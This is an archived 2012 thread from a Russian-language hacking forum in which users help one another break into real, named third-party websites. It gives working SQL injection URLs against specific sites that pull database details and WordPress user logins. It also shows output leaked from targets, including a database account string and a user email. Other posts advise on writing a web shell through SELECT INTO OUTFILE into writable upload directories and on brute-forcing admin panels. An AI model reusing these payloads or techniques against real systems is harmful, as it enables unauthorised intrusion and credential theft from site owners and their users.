ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.03.2012, 21:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом
|
|
|
|
09.03.2012, 21:53
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом
Ок, еще бы про составление запроса проконсультировали бы
|
|
|
09.03.2012, 22:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Faaax
Faaax said:
помогите раскрутить,вроде всё правильно делаю
Код:
Code:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
|
|
|
|
09.03.2012, 22:47
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от er9j6@
er9j6@ said:
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай
И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?
|
|
|
|
10.03.2012, 14:50
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
Код:
Code:
HTTP/1.1 500 Internal Server Error
Date: Sat, 10 Mar 2012 09:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9201
Conversione non riuscita durante la conversione del valore nvarchar 'u:baudo@apre.it' nel tipo di dati int.
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема? |
|
|
|
10.03.2012, 15:38
|
|
Новичок
Регистрация: 13.06.2010
Сообщений: 0
Провел на форуме:
521
Репутация:
0
|
|
Можно ли залить шелл на InstantCMS v1.9 ?
|
|
|
|
10.03.2012, 15:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от durito
durito said:
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?
Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.
|
|
|
|
10.03.2012, 17:31
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Код:
Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1--
Так выводит, а так нет...
Код:
Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1--
Как вывести?
P.S: использовать функции ASCII() и CHAR? |
|
|
|
10.03.2012, 17:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
39063
Репутация:
0
|
|
выручайте!
есть рут доступ к phpmyadmin.
мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:
когда я пишу код
Код:
Code:
SELECT '' INTO OUTFILE '/dir/name/shell.php'
где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.
решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/
туда все спокойно льется, только понять где находится заветный php файл мне не удается.
Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю |
|
|
|
10.03.2012, 18:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
aydin-ka,
в другой базе твоя таблица.
Узнаем вот так:
Код:
Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+information_schema.tables+where+table_name='wp_users'),3--+
Теперь выводит логин:
Код:
Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f
stan0009,
Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
